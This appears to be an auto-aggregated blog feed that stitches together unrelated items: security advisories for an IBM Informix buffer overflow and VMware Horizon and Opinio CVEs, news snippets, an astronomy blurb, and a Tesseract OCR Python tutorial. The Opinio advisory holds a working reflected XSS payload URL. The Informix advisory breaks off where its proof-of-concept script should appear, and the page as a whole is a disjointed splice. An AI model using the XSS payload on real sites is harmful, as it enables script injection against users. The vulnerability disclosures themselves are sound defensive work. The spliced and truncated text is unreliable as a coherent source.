DefenseCode Security Advisory IBM Informix DB-Access Buffer Overflow Advisory ID: DC-2017-04-001 Advisory Title: IBM Informix DB-Access Buffer Overflow Advisory URL: http://ift.tt/2t978wz Software: IBM Informix Version: 12.10 Vendor Status: Vendor Contacted / Not Fixed Release Date: 11.07.2017 Risk: High 1. General Overview =================== IBM Informix DB-Access utility is vulnerable to a stack based buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. The vulnerability is triggered by providing an overly long file parameter value inside a LOAD statement, which is used to insert data from an operating-system file into an existing table or view. 2. Software Overview =================== Informix is one of the world’s most widely used database servers with users ranging from the world’s largest corporations to start-ups. IBM Informix incorporates design concepts that are significantly different from traditional relational platforms, resulting in extremely high levels of performance and availability, distinctive capabilities in data replication and scalability, and minimal administrative overhead. The DB-Access utility is included with the Informix server and with the Informix Client Software Development Kit. DB-Access provides a menu-driven interface for entering, running, and debugging SQL statements and Stored Procedure Language routines. DB-Access can also be ran interactively from the command line. 3. Brief Vulnerability Description ================================== By providing a specially crafted command file to the DB-Access command line utility it is possible to cause a buffer overflow, overwriting the instruction pointer (EIP) and thus hijack the execution flow of the program. Crafted file contains a LOAD statement with an overly long file parameter that will overwrite EIP. 3.1 Proof of Concept The following python script will generate a proof of concept .sql crash test file that can be used to verify the vulnerability:

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2017-4918: Code Injection in VMware Horizon’s macOS Client

CVE-2017-4918: Code Injection in VMware Horizon’s macOS Client Metadata =================================================== Release Date: 10-July-2017 Author: Florian Bogner // https://bogner.sh Affected product: VMware Horizon‘s macOS Client Fixed in: Version 4.5 Tested on: OS X El Capitan 10.11.6 CVE: CVE-2017-4918 URL: http://ift.tt/2tAz540 Vulnerability Status: Fixed Product Description =================================================== VMware Horizon 7 is the leading platform for virtual desktops and applications. Provide end users access to all of their virtual desktops, applications, and online services through a single digital workspace. Vulnerability Description =================================================== An issue within a shell script of VMware Horizon's macOS client could be abused to load arbitrary kernel extensions. In detail, this was possible because a user modifiable environment variable was used to build the command line for a highly privileged command. Further technical details can be found on my blog: http://ift.tt/2tAz540 Suggested Solution =================================================== Update to the latest version (fixed in 4.5) Disclosure Timeline =================================================== 21-04-2017: The issues has been documented and reported 24-04-2017: VMware started investigating 06-06-2017: Fix ready 08-06-2017: Updated Horizon version 4.5 alongside security advisory VMSA-2017-0011 released Florian Bogner eMail: florian@bogner.sh Web: http://www.bogner.sh LinkedIn: http://ift.tt/2bwZ319 Xing: http://ift.tt/2buCzte

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2017-10798] ObjectPlanet Opinio 7.6.3 Cross-Site Scripting (XSS)

Vendor: ObjectPlanet Product: Opinio Version: Up to 7.6.3 (inclusive) Homepage: http://ift.tt/RGhmPW CVE: CVE-2017-10798 Description ================ Reflected XSS vulnerability in ObjectPlanet Opinio up to version 7.6.3. Vulnerability ================ The /admin/reportPortal.do page is vulnerable to reflected XSS attacks through the userLanguage GET parameter. This page is available to remote, unauthenticated users. Proof of concept ================ https://localhost/admin/reportPortal.do?userLanguage=%22%3E%3C/script%3E%3Cscript%3Ealert(1);// Mitigations ================ Upgrade to version 7.6.4 or later. References ================ http://ift.tt/2sKLn6T http://ift.tt/2v4OCXF Timeline ================ 2017-03-31 Vulnerability discovered 2017-04-01 Asked vendor how they prefer to receive vulnerability reports 2017-04-03 First response from vendor 2017-04-04 PoC sent to vendor 2017-04-05 Vendor confirms vulnerability. Patch will be included in next release within a few weeks. 2017-04-20 Patch released in version 7.6.4 - "Improved: Fixed some cross-site scripting vulnerabilities." http://ift.tt/2v4OCXF 2017-07-02 CVE Requested and received - "Use CVE-2017-10798." 2017-07-09 Public disclosure Discovered by Kasper Karlsson

Source: Gmail -> IFTTT-> Blogger

Anonymous image bouard

Anonymous image bouard. Dec 20, 2016. Creative team: What is difference between the drugs hydrocodone and oxycodone. Anonymous image ...

from Google Alert - anonymous http://ift.tt/2udiXaa
via IFTTT

Google Silently Adds 'Panic Detection Mode" to Android 7.1 – How It's Useful

How often do you click the 'back' or the ‘Home’ button on your mobile device to exit an application immediately? I believe, several times in a single day because a large number of apps do not have an exit button to directly force-close them instead of going back and back and back until they exit. Sometimes Android users expect the back button to take them back to the back page, but sometimes

from The Hacker News http://ift.tt/2v6FnWJ
via IFTTT

Samsung SDS

Competitive salary and compensations, brand name, smart co-workers, flexible working hours depending on what department you belong to.

from Google Alert - anonymous http://ift.tt/2uM3vP5
via IFTTT

Star Cluster Omega Centauri in HDR

Behold the largest ball of stars in our galaxy. Omega Centauri is packed with about 10 million stars, many older than our Sun and packed within a volume of only about 150 light-years in diameter. The star cluster is the largest and brightest of 200 or so known globular clusters that roam the halo of our Milky Way galaxy. Though most star clusters consist of stars with the same age and composition, the enigmatic Omega Cen exhibits the presence of different stellar populations with a spread of ages and chemical abundances. In fact, Omega Cen may be the remnant core of a small galaxy merging with the Milky Way. The featured image shows so many stars because it merged different exposures with high dynamic range (HDR) techniques. Omega Centauri, also known as NGC 5139, lies about 15,000 light-years away toward the southern constellation of the Centaurus. via NASA http://ift.tt/2tFFKIl

Instrumentälischer Bettlermantl (Anonymous)

An anonymous 17th-century manuscript comprising information about and basic instructions for 30 different instruments. Roughly two thirds of the text ...

from Google Alert - anonymous http://ift.tt/2tHzFLA
via IFTTT

PHOTO: Anonymous Art Show

The Abbotsford Arts Council held an opening reception on Saturday night for its fourth annual Anonymous Art Show at Kariton Art Gallery. Each artist ...

from Google Alert - anonymous http://ift.tt/2uKbxrU
via IFTTT

Member Inner class and Anonymous Inner Class

Explanation of member inner class and anonymous inner class with examples, their main syntax and their internal working.

from Google Alert - anonymous http://ift.tt/2tGBng5
via IFTTT

Anonymous donors to match up to $200K for Ann Arbor theater renovations

Anonymous donors are offering to match up to $200,000 in donations for improvements to the State and Michigan theaters. Click here to read full story ...

from Google Alert - anonymous http://ift.tt/2sXHxvn
via IFTTT

"Lol" - Ed Reed tweets response to being ranked No. 4 safety of all time (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Using Tesseract OCR with Python

In last week’s blog post we learned how to install the Tesseract binary for Optical Character Recognition (OCR).

We then applied the Tesseract program to test and evaluate the performance of the OCR engine on a very small set of example images.

As our results demonstrated, Tesseract works best when there is a (very) clean segmentation of the foreground text from the background. In practice, it can be extremely challenging to guarantee these types of segmentations. Hence, we tend to train domain-specific image classifiers and detectors.

Nevertheless, it’s important that we understand how to access Tesseract OCR via the Python programming language in the case that we need to apply OCR to our own projects (provided we can obtain the nice, clean segmentations required by Tesseract).

Example projects involving OCR may include building a mobile document scanner that you wish to extract textual information from or perhaps you’re running a service that scans paper medical records and you’re looking to put the information into a HIPA-Compliant database.

In the remainder of this blog post, we’ll learn how to install the Tesseract OCR + Python “bindings” followed by writing a simple Python script to call these bindings. By the end of the tutorial, you’ll be able to convert text in an image to a Python string data type.

To learn more about using Tesseract and Python together with OCR, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

Using Tesseract OCR with Python

This blog post is divided into three parts.

First, we’ll learn how to install the pytesseract package so that we can access Tesseract via the Python programming language.

Next, we’ll develop a simple Python script to load an image, binarize it, and pass it through the Tesseract OCR system.

Finally, we’ll test our OCR pipeline on some example images and review the results.

To download the source code + example images to this blog post, be sure to use the “Downloads” section below.

Installing the Tesseract + Python “bindings”

Let’s begin by getting

pytesseract

  installed. To install

pytesseract

  we’ll take advantage of

pip

 .

If you’re using a virtual environment (which I highly recommend so that you can separate different projects), use the

workon

  command followed by the appropriate virtual environment name. In this case, our virtualenv is named

cv

 .

$ workon cv

Next let’s install Pillow, a more Python-friendly port of PIL (a dependency) followed by

pytesseract

 .

$ pip install pillow
$ pip install pytesseract

Note:

pytesseract

  does not provide true Python bindings. Rather, it simply provides an interface to the

tesseract

  binary. If you take a look at the project on GitHub you’ll see that the library is writing the image to a temporary file on disk followed by calling the

tesseract

  binary on the file and capturing the resulting output. This is definitely a bit hackish, but it gets the job done for us.

Let’s move forward by reviewing some code that segments the foreground text from the background and then makes use of our freshly installed

pytesseract

 .

Applying OCR with Tesseract and Python

Let’s begin by creating a new file named 

ocr.py

 :

# import the necessary packages
from PIL import Image
import pytesseract
import argparse
import cv2
import os

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to input image to be OCR'd")
ap.add_argument("-p", "--preprocess", type=str, default="thresh",
        help="type of preprocessing to be done")
args = vars(ap.parse_args())

Lines 2-6 handle our imports. The

Image

  class is required so that we can load our input image from disk in PIL format, a requirement when using

pytesseract

 .

Our command line arguments are parsed on Lines 9-14. We have two command line arguments:

• --image
  

   : The path to the image we’re sending through the OCR system.

• --preprocess
  

   : The preprocessing method. This switch is optional and for this tutorial and can aceppt two values: 

  thresh
  

    (threshold) or

  blur
  

   .

Next we’ll load the image, binarize it, and write it to disk.

# load the example image and convert it to grayscale
image = cv2.imread(args["image"])
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# check to see if we should apply thresholding to preprocess the
# image
if args["preprocess"] == "thresh":
        gray = cv2.threshold(gray, 0, 255,
                cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]

# make a check to see if median blurring should be done to remove
# noise
elif args["preprocess"] == "blur":
        gray = cv2.medianBlur(gray, 3)

# write the grayscale image to disk as a temporary file so we can
# apply OCR to it
filename = "{}.png".format(os.getpid())
cv2.imwrite(filename, gray)

First, we load

--image

  from disk into memory (Line 17) followed by converting it to grayscale (Line 18).

Next, depending on the pre-processing method specified by our command line argument, we will either threshold or blur the image. This is where you would want to add more advanced pre-processing methods (depending on your specific application of OCR) which are beyond the scope of this blog post.

The

if

  statement and body on Lines 22-24 perform a threshold in order to segment the foreground from the background. We do this using both 

cv2.THRESH_BINARY

  and

cv2.THRESH_OTSU

  flags. For details on Otsu’s method, see “Otsu’s Binarization” in the official OpenCV documentation.

We will see later in the results section that this thresholding method can be useful to read dark text that is overlaid upon gray shapes.

Alternatively, a blurring method may be applied. Lines 28-29 perform a median blur when the

--preprocess

  flag is set to

blur

 . Applying a median blur can help reduce salt and pepper noise, again making it easier for Tesseract to correctly OCR the image.

After pre-processing the image, we use 

os.getpid

  to derive a temporary image

filename

 based on the process ID of our Python script (Line 33).

The final step before using

pytesseract

 for OCR is to write the pre-processed image,

gray

 , to disk saving it with the

filename

  from above (Line 34).

We can finally apply OCR to our image using the Tesseract Python “bindings”:

# load the image as a PIL/Pillow image, apply OCR, and then delete
# the temporary file
text = pytesseract.image_to_string(Image.open(filename))
os.remove(filename)
print(text)

# show the output images
cv2.imshow("Image", image)
cv2.imshow("Output", gray)
cv2.waitKey(0)

Using

pytesseract.image_to_string

  on Line 38 we convert the contents of the image into our desired string,

text

 . Notice that we passed a reference to the temporary image file residing on disk.

This is followed by some cleanup on Line 39 where we delete the temporary file.

Line 40 is where we print text to the terminal. In your own applications, you may wish to do some additional processing here such as spellchecking for OCR errors or Natural Language Processing rather than simply printing it to the console as we’ve done in this tutorial.

Finally, Lines 43 and 44 handle displaying the original image and pre-processed image on the screen in separate windows. The

cv2.waitKey(0)

  on Line 34 indicates that we should wait until a key on the keyboard is pressed before exiting the script.

Let’s see our handywork in action.

Tesseract OCR and Python results

Now that

ocr.py

  has been created, it’s time to apply Python + Tesseract to perform OCR on some example input images.

In this section we will try OCR’ing three sample images using the following process:

• First, we will run each image through the Tesseract binary as-is.
• Then we will run each image through

  ocr.py
  

    (which performs pre-processing before sending through Tesseract).
• Finally, we will compare the results of both of these methods and note any errors.

Our first example is a “noisy” image. This image contains our desired foreground black text on a background that is partly white and partly scattered with artificially generated circular blobs. The blobs act as “distractors” to our simple algorithm.

Figure 1: Our first example input for Optical Character Recognition using Python.

Using the Tesseract binary, as we learned last week, we can apply OCR to the raw, unprocessed image:

$ tesseract images/example_01.png stdout
Noisy image
to test
Tesseract OCR

Tesseract performed well with no errors in this case.

Now let’s confirm that our newly made script,

ocr.py

 , also works:

$ python ocr.py --image images/example_01.png
Noisy image
to test
Tesseract OCR

Figure 2: Applying image preprocessing for OCR with Python.

As you can see in this screenshot, the thresholded image is very clear and the background has been removed. Our script correctly prints the contents of the image to the console.

Next, let’s test Tesseract and our pre-processing script on an image with “salt and pepper” noise in the background:

Figure 3: An example input image containing noise. This image will “confuse” our OCR algorithm, leading to incorrect OCR results.

We can see the output of the

tesseract

  binary below:

$ tesseract images/example_02.png stdout
Detected 32 diacritics
" Tesséra‘c't Will
Fail With Noisy
Backgrounds

Unfortunately, Tesseract did not successfully OCR the text in the image.

However, by using the

blur

  pre-processing method in

ocr.py

  we can obtain better results:

$ python ocr.py --image images/example_02.png --preprocess blur
Tesseract Will
Fail With Noisy
Backgrounds

Figure 4: Applying image preprocessing with Python and OpenCV to improve OCR results.

Success! Our blur pre-processing step enabled Tesseract to correctly OCR and output our desired text.

Finally, let’s try another image, this one with more text:

Figure 5: Another example input to our Tesseract + Python OCR system.

The above image is a screenshot from the “Prerequisites” section of my book, Practical Python and OpenCV — let’s see how the Tesseract binary handles this image:

$ tesseract images/example_03.png stdout
PREREQUISITES

In order In make the rnosi of this, you will need (a have
a little bit of pregrarrmung experience. All examples in this
book are in the Python programming language. Familiarity
with Pyihon or other scriphng languages is suggesied, but
mm required.

You'll also need (a know some basic mathematics. This
book is handson and example driven: leis of examples and
lots of code, so even if your math skills are noi up to par.
do noi worry! The examples are very damned and heavily
documented (a help yuu follaw along.

Followed by testing the image with

ocr.py

 :

$ python ocr.py --image images/example_03.png
PREREQUISITES

Lu order to make the most ol this, you will need to have
a little bit ol programming experience. All examples in this
book are in the Python programming language. Familiarity
with Python or other scripting languages is suggested, but
not requixed.

You’ll also need to know some basic mathematics. This
book is handson and example driven: lots of examples and
lots ol code, so even ii your math skills are not up to par,
do not worry! The examples are very detailed and heavily
documented to help you tollow along.

Figure 6: Applying Optical Character Recognition (OCR) using Python, OpenCV, and Tesseract.

Notice misspellings in both outputs including, but not limited to, “In”, “of”, “required”, “programming”, and “follow”.

The output for both of these do not match; however, interestingly the pre-processed version has only 8 word errors whereas the non-pre-processed image has 17 word errors (over twice as many errors). Our pre-processing helps even on a clean background!

Python + Tesseract did a reasonable job here, but once again we have demonstrated the limitations of the library as an off-the-shelf classifier.

We may obtain good or acceptable results with Tesseract for OCR, but the best accuracy will come from training custom character classifiers on specific sets of fonts that appear in actual real-world images.

Don’t let the results of Tesseract OCR discourage you — simply manage your expectations and be realistic on Tesseract’s performance. There is no such thing as a true “off-the-shelf” OCR system that will give you perfect results (there are bound to be some errors).

Note: If your text is rotated, you may wish to do additional pre-processing as is performed in this previous blog post on correcting text skew. Otherwise, if you’re interested in building a mobile document scanner, you now have a reasonably good OCR system to integrate into it.

Summary

In today’s blog post we learned how to apply the Tesseract OCR engine with the Python programming language. This enabled us to apply OCR algorithms from within our Python script.

The biggest downside is with the limitations of Tesseract itself. Tesseract works best when there are extremely clean segmentations of the foreground text from the background.

Furthermore these segmentations need to be as high resolution (DPI) as possible and the characters in the input image cannot appear “pixelated” after segmentation. If characters do appear pixelated then Tesseract will struggle to correctly recognize the text — we found this out even when applying images captured under ideal conditions (a PDF screenshot).

OCR, while no longer a new technology, is still an active area of research in the computer vision literature especially when applying OCR to real-world, unconstrained images. Deep learning and Convolutional Neural Networks (CNNs) are certainly enabling us to obtain higher accuracy, but we are still a long way from seeing “near perfect” OCR systems. Furthermore, as OCR has many applications across many domains, some of the best algorithms used for OCR are commercial and require licensing to be used in your own projects.

My primary suggestion to readers when applying OCR to their own projects is to first try Tesseract and if results are undesirable move on to the Google Vision API.

If neither Tesseract nor the Google Vision API obtain reasonable accuracy, you might want to reassess your dataset and decide if it’s worth it to train your own custom character classifier — this is especially true if your dataset is noisy and/or contains very specific fonts you wish to detect and recognize. Examples of specific fonts include the digits on a credit card, the account and routing numbers found at the bottom of checks, or stylized text used in graphic design.

I hope you are enjoying this series of blog posts on Optical Character Recognition (OCR) with Python and OpenCV!

To be notified when new blog posts are published here on PyImageSearch, be sure to enter your email address in the form below!

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

Email address:

The post Using Tesseract OCR with Python appeared first on PyImageSearch.

from PyImageSearch http://ift.tt/2uIABj6
via IFTTT